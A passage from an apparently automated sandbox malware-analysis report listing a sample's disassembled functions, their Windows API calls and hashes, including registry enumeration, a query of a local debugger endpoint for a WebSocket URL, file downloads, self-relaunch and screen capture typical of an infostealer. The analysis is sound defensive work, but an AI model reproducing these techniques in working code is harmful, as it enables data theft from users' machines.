                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID:
                                    • API String ID: 2500673778-0
                                    • Opcode ID: 60c620921027291f7b3f051e5e7f8f5f6897e3d5e0a34df71ee77119324b766e
                                    • Instruction ID: 93fccf4144dfd62230598477cd517c97dd18587ab77702475b8458f724c31d3f
                                    • Opcode Fuzzy Hash: 60c620921027291f7b3f051e5e7f8f5f6897e3d5e0a34df71ee77119324b766e
                                    • Instruction Fuzzy Hash: FB024130E01615CFCB65DFA9D949BAAB7F1AF46305F18806EE4099B263D775DC82CB80
                                    Function 000C3760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 000C71FE
                                    • RegOpenKeyExA.ADVAPI32(?,00E6AC70,00000000,00020019,?), ref: 000C37BD
                                    • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 000C37F7
                                    • wsprintfA.USER32 ref: 000C3822
                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 000C3840
                                    • RegCloseKey.ADVAPI32(?), ref: 000C384E
                                    • RegCloseKey.ADVAPI32(?), ref: 000C3858
                                    • RegQueryValueExA.ADVAPI32(?,00E6DE70,00000000,000F003F,?,?), ref: 000C38A1
                                    • lstrlen.KERNEL32(?), ref: 000C38B6
                                    • RegQueryValueExA.ADVAPI32(?,00E6DDF8,00000000,000F003F,?,00000400), ref: 000C3927
                                    • RegCloseKey.ADVAPI32(?), ref: 000C3972
                                    • RegCloseKey.ADVAPI32(?), ref: 000C3989
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 13140697-3278919252
                                    • Opcode ID: 2d8a8f5fb950dd89241b8d0fda76954a7412a3ba667032af4f1b6e7e5fc35813
                                    • Instruction ID: 804508bb0266e007d5efd2deec938b06843e0f1dc184b23c222695d6f95a4062
                                    • Opcode Fuzzy Hash: 2d8a8f5fb950dd89241b8d0fda76954a7412a3ba667032af4f1b6e7e5fc35813
                                    • Instruction Fuzzy Hash: 02914972D112089FCB10DFA4D984EEEB7B9FB48310F14856EE509AB251D731AE45CFA0
                                    Function 000A90C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenA.WININET(000CCFEC,00000001,00000000,00000000,00000000), ref: 000A90DF
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 000A90FC
                                    • InternetCloseHandle.WININET(00000000), ref: 000A9109
                                    • InternetReadFile.WININET(?,?,?,00000000), ref: 000A9166
                                    • InternetReadFile.WININET(00000000,?,00001000,?), ref: 000A9197
                                    • InternetCloseHandle.WININET(00000000), ref: 000A91A2
                                    • InternetCloseHandle.WININET(00000000), ref: 000A91A9
                                    • strlen.MSVCRT ref: 000A91BA
                                    • strlen.MSVCRT ref: 000A91ED
                                    • strlen.MSVCRT ref: 000A922E
                                    • strlen.MSVCRT ref: 000A924C
                                      • Part of subcall function 000A8980: std::_Xinvalid_argument.LIBCPMT ref: 000A8996
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 1530259920-2144369209
                                    • Opcode ID: 3d439c0af2891c49ef8d66bca0bde1523d8d2bd64b650b527c27377dfe4727dd
                                    • Instruction ID: 0e95a6145fd922699f33cde0f0951f287472b385965a6ff0943354d36bd3447d
                                    • Opcode Fuzzy Hash: 3d439c0af2891c49ef8d66bca0bde1523d8d2bd64b650b527c27377dfe4727dd
                                    • Instruction Fuzzy Hash: C251B271B00205ABE710DBE8DC49FEEB7F9DB48720F14016AF508E7281DBB4EA4587A5
                                    Function 000C1660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 000C16A1
                                    • lstrcpy.KERNEL32(00000000,00E5B180), ref: 000C16CC
                                    • lstrlen.KERNEL32(?), ref: 000C16D9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C16F6
                                    • lstrcat.KERNEL32(00000000,?), ref: 000C1704
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C172A
                                    • lstrlen.KERNEL32(00E69B38), ref: 000C173F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C1762
                                    • lstrcat.KERNEL32(00000000,00E69B38), ref: 000C176A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1792
                                    • ShellExecuteEx.SHELL32(?), ref: 000C17CD
                                    • ExitProcess.KERNEL32 ref: 000C1803
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                    • String ID: <
                                    • API String ID: 3579039295-4251816714
                                    • Opcode ID: 4787a8a84286a9dc7ef4ff2063b7af85b390b01bf755409ebcf16ea11f82d500
                                    • Instruction ID: e4294a7f4f4d33f6d1d76463d126f939858ec0e0ef7655f5348f9e40934e8464
                                    • Opcode Fuzzy Hash: 4787a8a84286a9dc7ef4ff2063b7af85b390b01bf755409ebcf16ea11f82d500
                                    • Instruction Fuzzy Hash: AE517271E02219EBDB51DFA4DC88ADEB7F9AF55300F54413AF505E7252EB30AE018B90
                                    Function 000A6AD0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 127networkfilestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A6AFF
                                    • InternetOpenA.WININET(000CCFEC,00000001,00000000,00000000,00000000), ref: 000A6B2C
                                    • StrCmpCA.SHLWAPI(?,00E6E578), ref: 000A6B4A
                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 000A6B6A
                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 000A6B88
                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 000A6BA1
                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 000A6BC6
                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 000A6BF0
                                    • CloseHandle.KERNEL32(00000000), ref: 000A6C10
                                    • InternetCloseHandle.WININET(00000000), ref: 000A6C17
                                    • InternetCloseHandle.WININET(?), ref: 000A6C21
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                    • String ID: x
                                    • API String ID: 2500263513-2890206012
                                    • Opcode ID: a61c490935199c99bb5c316f4b6075b4addb4c456836d2b48e8cebebfb7840e0
                                    • Instruction ID: eaa4b18c8ce6c693c1564df827c0c706a246dde3f679a915834a623fc5bf0d33
                                    • Opcode Fuzzy Hash: a61c490935199c99bb5c316f4b6075b4addb4c456836d2b48e8cebebfb7840e0
                                    • Instruction Fuzzy Hash: 4E41A171A10205AFDB20DFA4EC49FEE77B8EB04701F444465FA05E7190EF70AD448BA4
                                    Function 000BEFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BEFE4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BF012
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000BF026
                                    • lstrlen.KERNEL32(00000000), ref: 000BF035
                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 000BF053
                                    • StrStrA.SHLWAPI(00000000,?), ref: 000BF081
                                    • lstrlen.KERNEL32(?), ref: 000BF094
                                    • lstrlen.KERNEL32(00000000), ref: 000BF0B2
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 000BF0FF
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 000BF13F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$AllocLocal
                                    • String ID: ERROR
                                    • API String ID: 1803462166-2861137601
                                    • Opcode ID: 0597556af163a3ee07472be7ed9431790e0c8966e12f71cd82830d3dd9ab9485
                                    • Instruction ID: ce37fe1d091d9a13d4d82513b5f0d9c8e1fb7690b3bfeb5d6cbe7ac6f07671bb
                                    • Opcode Fuzzy Hash: 0597556af163a3ee07472be7ed9431790e0c8966e12f71cd82830d3dd9ab9485
                                    • Instruction Fuzzy Hash: 1C517B31A112169FCB21AFBCDC49AFE77E5EF55700F054979F84A9B622EA30DC018B91
                                    Function 000AA010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentVariableA.KERNEL32(00E68A10,002D9BD8,0000FFFF), ref: 000AA026
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000AA053
                                    • lstrlen.KERNEL32(002D9BD8), ref: 000AA060
                                    • lstrcpy.KERNEL32(00000000,002D9BD8), ref: 000AA08A
                                    • lstrlen.KERNEL32(000D4C4C), ref: 000AA095
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AA0B2
                                    • lstrcat.KERNEL32(00000000,000D4C4C), ref: 000AA0BE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AA0E4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000AA0EF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AA114
                                    • SetEnvironmentVariableA.KERNEL32(00E68A10,00000000), ref: 000AA12F
                                    • LoadLibraryA.KERNEL32(00E6D408), ref: 000AA143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                    • String ID:
                                    • API String ID: 2929475105-0
                                    • Opcode ID: 52ceef3de404ad5e8dac724f95eb8300ef1dbbd2811698eebe34311e12b8a8ed
                                    • Instruction ID: 85a3539d61ea2e32b6326c8be3f158267c89a3f7d41dea0749b9f174d8341a7f
                                    • Opcode Fuzzy Hash: 52ceef3de404ad5e8dac724f95eb8300ef1dbbd2811698eebe34311e12b8a8ed
                                    • Instruction Fuzzy Hash: AB91BF31F01A009FD7709FE8EC48AA637E5AB57704F40412AF5058B6A2EFB5DD80CB82
                                    Function 000BC840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BC8A2
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BC8D1
                                    • lstrlen.KERNEL32(00000000), ref: 000BC8FC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BC932
                                    • StrCmpCA.SHLWAPI(00000000,000D4C3C), ref: 000BC943
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: 46ffd5308bdc7f6fcef18c8160a70673c8b23976c4c77f2f058648a827321c83
                                    • Instruction ID: 996bf4c3197cf6323e1d0dd1b427973478d12aeba846f39f771e4e6de1898620
                                    • Opcode Fuzzy Hash: 46ffd5308bdc7f6fcef18c8160a70673c8b23976c4c77f2f058648a827321c83
                                    • Instruction Fuzzy Hash: A261C271E122199BEB10EFB4DC48EEE7BF8AF05704F04416AE845E7212DB349D018BA1
                                    Function 000C41E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,000C0CF0), ref: 000C4276
                                    • GetDesktopWindow.USER32 ref: 000C4280
                                    • GetWindowRect.USER32(00000000,?), ref: 000C428D
                                    • SelectObject.GDI32(00000000,00000000), ref: 000C42BF
                                    • GetHGlobalFromStream.COMBASE(000C0CF0,?), ref: 000C4336
                                    • GlobalLock.KERNEL32(?), ref: 000C4340
                                    • GlobalSize.KERNEL32(?), ref: 000C434D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                    • String ID:
                                    • API String ID: 1264946473-0
                                    • Opcode ID: aec2073ff38d037e5ca26dfb3e69f4b7ab8582f1c5b59363524ff08266b3196c
